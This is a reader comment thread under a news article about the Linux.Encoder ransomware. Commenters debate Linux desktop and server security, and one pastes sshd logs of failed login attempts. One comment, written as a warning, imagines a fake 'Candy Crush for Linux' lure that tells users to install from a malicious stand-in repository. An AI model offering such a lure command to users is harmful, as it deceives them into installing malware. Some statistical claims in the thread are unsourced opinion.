back to article Can't get a break: Pwned Linux ransomware pwned again, infects 3000

Pwned ransomware Linux Encoder has infected 3000 machines in a month, Russian security firm Dr Web says, despite the fact both versions of the software have been neutered. The first version of the ransomware was decrypted by security boffins at BitDefender days after it was first revealed by Dr Web. Linux.Encoder.1 encrypts …

  1. SecretSonOfHG

    Does it infect Linux destops?

    Or are we, the six of us, still safe? Seriously, one of the advantages of running a Linux desktop has always been that malware writers don't care about us. Security by minority has worked great for me in the last decade or so.

    1. Chemist

      Re: Does it infect Linux destops?

      Suggested reading :

      "https://en.wikipedia.org/wiki/Linux_malware"

      I know you are joking about "the six of us" as there are 10s of millions of desktop Linux users. The infection vector is content management systems that have been fixed already. So unless you are running such unpatched and exposing the same to the internet it seems very unlikely that you will have to face such problem.

      I've been running SSHD for >10years and in all that time only one attempt has attacked the (non-standard) port without success, I add. But that is the only internet-exposed port I have. Indeed I have all lower ports blocked at several points my ISP, router and firewalls. If you expose ports to the internet you need to be responsible enough to maintain configs/software/logs as well as the usual care with installation sources, permissions , e-mails etc.I usually browse in a VM as well.

      1. Anonymous Coward
        Anonymous Coward

        Re: Does it infect Linux destops?

        Downvoted 10 of millions...

        1. Chemist

          Re: Does it infect Linux destops?

          "Downvoted 10 of millions..."

          Say 1.5 billion desktops at @ 1.5% Linux - that's >20 million

        2. Anonymous Coward
          Anonymous Coward

          Re: Does it infect Linux destops?

          Downvoted 10 of millions...

          https://www.linuxcounter.net/statistics/users

      2. Anonymous Coward
        Anonymous Coward

        @chemist - only ONE attempt to attack SSHD?

        I get them all the time, just ignore them - though I'm running on the standard port 22 I tried moving it for a time and found it didn't stop the attacks for long, I guess they found it via port scanning. Here's what I've had in just the past hour:

        Dec 1 12:53:48 REDACTED sshd[610]: Connection closed by 75.167.206.109 [preauth]

        Dec 1 13:03:48 REDACTED sshd[738]: Connection closed by 75.167.206.109 [preauth]

        Dec 1 13:13:48 REDACTED sshd[872]: Connection closed by 75.167.206.109 [preauth]

        Dec 1 13:16:13 REDACTED sshd[882]: Did not receive identification string from 117.4.112.87

        Dec 1 13:16:14 REDACTED sshd[883]: Address 117.4.112.87 maps to localhost, but this does not map back to the address - POSSIBLE BREAK-IN ATTEMPT!

        Dec 1 13:16:14 REDACTED sshd[883]: Invalid user support from 117.4.112.87

        Dec 1 13:16:14 REDACTED sshd[883]: input_userauth_request: invalid user support [preauth]

        Dec 1 13:16:15 REDACTED sshd[883]: pam_unix(sshd:auth): check pass; user unknown

        Dec 1 13:16:15 REDACTED sshd[883]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.4.112.87

        Dec 1 13:16:17 REDACTED sshd[883]: Failed password for invalid user support from 117.4.112.87 port 51949 ssh2

        Dec 1 13:16:18 REDACTED sshd[883]: Received disconnect from 117.4.112.87: 3: com.jcraft.jsch.JSchException: Auth fail [preauth]

        Dec 1 13:23:48 REDACTED sshd[910]: Connection closed by 75.167.206.109 [preauth]

        Dec 1 13:33:47 REDACTED sshd[1225]: Connection closed by 75.167.206.109 [preauth]

        Dec 1 13:43:48 REDACTED sshd[1346]: Connection closed by 75.167.206.109 [preauth]

        Dec 1 13:47:33 REDACTED sshd[1354]: Did not receive identification string from 212.83.161.12

        Dec 1 13:47:34 REDACTED sshd[1355]: Invalid user support from 212.83.161.12

        Dec 1 13:47:34 REDACTED sshd[1355]: input_userauth_request: invalid user support [preauth]

        Dec 1 13:47:34 REDACTED sshd[1355]: pam_unix(sshd:auth): check pass; user unknown

        Dec 1 13:47:34 REDACTED sshd[1355]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=212-83-161-12.rev.nameserverdot.com

        Dec 1 13:47:36 REDACTED sshd[1355]: Failed password for invalid user support from 212.83.161.12 port 56924 ssh2

        Dec 1 13:47:37 REDACTED sshd[1355]: Received disconnect from 212.83.161.12: 3: com.jcraft.jsch.JSchException: Auth fail [preauth]

        1. Chemist

          Re: @chemist - only ONE attempt to attack SSHD?

          "I get them all the time, just ignore them"

          Staggering isn't it. I have, as I say, just had the one on the non-standard port. I get attempts against the usual suspects all the time.but no other ports are open. I do other things when I'm being paranoid -like limiting the time the port is open to a small time window every day. But I do use it for real all the time when travelling.

          1. depicus

            Re: @chemist - only ONE attempt to attack SSHD?

            Turn off passwords and use a cert login helps.

        2. Vic

          Re: @chemist - only ONE attempt to attack SSHD?

          Here's what I've had in just the past hour

          I also run sshd on port 22 - and I've had rather more attacks than you, so I won't bother pasting the log here.

          But the daemon I run that is visible externally doesn't accept password logins at all. So no-one is getting in without the key...

          Vic.

          1. Anonymous Coward
            Anonymous Coward

            Re: @chemist - only ONE attempt to attack SSHD?

            The times when I need to get in via SSH are when I'm doing something like helping my parents out with their PC and need to look up something on my home computer. I can ssh via my phone, but it is such a pain trying to type Unix CLI commands on a phone it just isn't worth the hassle.

            So yeah, I have a password login exposed to the internet, but if they can somehow get hold of my password they deserve to get in....not like I keep state secrets on my desktop computer - I'd probably be more concerned with someone getting hold of what's on my phone.

            1. Chemist

              Re: @chemist - only ONE attempt to attack SSHD?

              "and need to look up something on my home computer. I can ssh via my phone"

              Well I don't know what phne you are using but I generally access files from home using a file manager via fish protocol. My home file system is just another folder in my file manager.

              https://en.wikipedia.org/wiki/Files_transferred_over_shell_protocol

    2. Anonymous Coward
      Anonymous Coward

      Re: Does it infect Linux destops?

      Security by minority

      Sure, for desktops.

      Although the majority of servers are Linux, and has been the target of attack since day one.

      I think the low number of Linux infections (as a per-OS percentage) is due mainly to the mindset. Downloading a random executables from an untrusted (not to mention non-ssl) source just isn't done. Not just for the sake of security, but because that's the way it's done.

      Add this to the fact that most desktops don't connect directly to the internet (and therefore aren't subject to the same type of attacks servers do), means the chance of being infected is very slim.

      It has little to do with how many users or vulnerabilities the OS has.

      It's the same with mobiles/tablets (even Windows), provided you keep "untrusted sources" off.

      1. The Original Steve

        Re: Does it infect Linux destops?

        Since MS cleaned up it's act in the last 5-10 years Windows and other MS software's weakest area has been th fleshy bit IMHO.

        Far from perfect, but best practice and knowledge of what you're doing makes most mainstream platforms pretty secure by default these days.

      2. Anonymous Coward
        Anonymous Coward

        Re: Does it infect Linux destops?

        "Although the majority of servers are Linux, and has been the target of attack since day one."

        Yep - and allowing for market share - if you look at say Website defacement stats - Linux boxes are approx. 4 times more likely to be successfully hacked than an Internet facing Windows server based systems. Linux based systems have at least over most of the past decade had far more vulnerabilities that on average take longer to get patches released once publically known (more days at risk).

        "I think the low number of Linux infections (as a per-OS percentage) is due mainly to the mindset."

        Linux is the highest percentage versus other OSs when you look at servers (even adjusting for market share).

        "most desktops don't connect directly to the internet "

        Not true. Most do - or at least have access. The primary vulnerability issue for desktops is user interaction.

        "It has little to do with how many users or vulnerabilities the OS has."

        Disagree entirely.

        1. SecretSonOfHG

          Re: Does it infect Linux destops?

          <<Linux based systems have at least over most of the past decade had far more vulnerabilities that on average take longer to get patches released once publically known (more days at risk).>>

          Source?

          1. Anonymous Coward
            Anonymous Coward

            Re: Does it infect Linux destops?

            Told by Microsoft PR so it must be the truth cause they're good at it.

          2. David Pearce

            Re: Does it infect Linux destops?

            Could actually be true if you count all of the home routers running Linux, with hard coded root passwords and total lack of patching

            1. Richard Plinston

              Re: Does it infect Linux destops?

              > home routers running Linux, with hard coded root passwords

              Routers are typically configured by default with no ports open on the internet facing side. They will only allow access from _inside_ the local network. That is true whichever OS is being used in the router and regardless of what desktop OSes are in the network.

        2. Anonymous Coward
          Anonymous Coward

          Re: Does it infect Linux destops?

          "most desktops don't connect directly to the internet "

          Not true. Most do - or at least have access

          I said directly. Most desktops connect through some sort of a router. If you were to port scan my public IP address, you'll be scanning my router - not my desktop. Therefore, the types of attacks that servers are susceptible to aren't relevant to desktops, on the whole.

          The primary vulnerability issue for desktops is user interaction.

          Like I said, hence:

          "It has little to do with how many users or vulnerabilities the OS has."

        3. Richard Plinston

          Re: Does it infect Linux destops?

          > on average take longer to get patches released once publically known (more days at risk).

          That is because Microsoft does not make public the issue until the patches are released. This does not change the 'days at risk' as you claim because it is not the 'public' that create the risk. The risk occurs from the time that black hats create it, not when the public is told of it.

      3. Crazy Operations Guy

        Re: "Downloading a random executables from an untrusted ... source just isn't done."

        I'd agree when it comes to power-users and other folk who understand what is happening behind the scenes, but as the great unwashed start using it, that'll change fairly quickly.

        More and more, I see newbies pop up onto forums asking about a specific piece of software or hardware working and are then directed to install a package off a personal or obscure repository, I don't think it'd be too long (if it hasn't happened already) that someone will post a link to a repository hosting compromised software.

        I figure that you could probably get a lot of people to install your malware if you advertise it as something like "Candy Crush for Linux! Just run 'doas apt-get http://malicious.domain.ru/repos/...'. ignore the encryption error since this is my personal repository and I just finished this". Hell, they could cover their tracks by just bundling in an Android Emulator so it works, but does nasty things in the background.

        But what worries me the most is the proliferation of systemd and the philosophy that goes with it ('Don't worry, the OS will take care of it, nothing for you to see here, just an obfuscated database and API'); its big and bloated enough that there are many, many little spots to hide malware and other assorted nasties, although one might argue that systemd is, in itself, a piece of malware...

      4. Richard Plinston

        Re: Does it infect Linux destops?

        > Downloading a random executables from an untrusted (not to mention non-ssl) source just isn't done.

        Not only that but on Linux a downloaded file is _not_ executable no matter what its filename is, it requires specific user action (eg running chmod) before it can become executable. Also, Linux mail program do not automatically execute attachments, which is another vector on another OS.

        1. Vic

          Re: Does it infect Linux destops?

          Not only that but on Linux a downloaded file is _not_ executable no matter what its filename is, it requires specific user action (eg running chmod) before it can become executable.

          Whilst you're absolutely right, don't underestimate the willingness of users to believe everything they read on Internet fora.

          I used to have regular set-tos with a customer who insisted I chmod everything on his server to 777. He'd read somewhere that that would make things work better. I insisted on having that sort of thing in writing before even considering it...

          Vic.

  2. Mystic Megabyte
    Unhappy

    Reader's digest

    Over on Ars it seems that the Reader's Digest site is dishing out CryptoWall 3.0

    http://arstechnica.co.uk/security/2015/12/hey-readers-digest-your-site-has-been-attacking-visitors-for-days/

    1. waldo kitty
      Boffin

      Re: Reader's digest

      Over on Ars it seems that the Reader's Digest site is dishing out CryptoWall 3.0

      i saw this reported several days ago... not sure who reported it but it was one of the security groups... maybe "Naked Security" or "Packet Storm" or similar...

  3. phil dude
    Joke

    Paranoia is good....

    It's why we block ads after all....

    P.

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon

Other stories you might like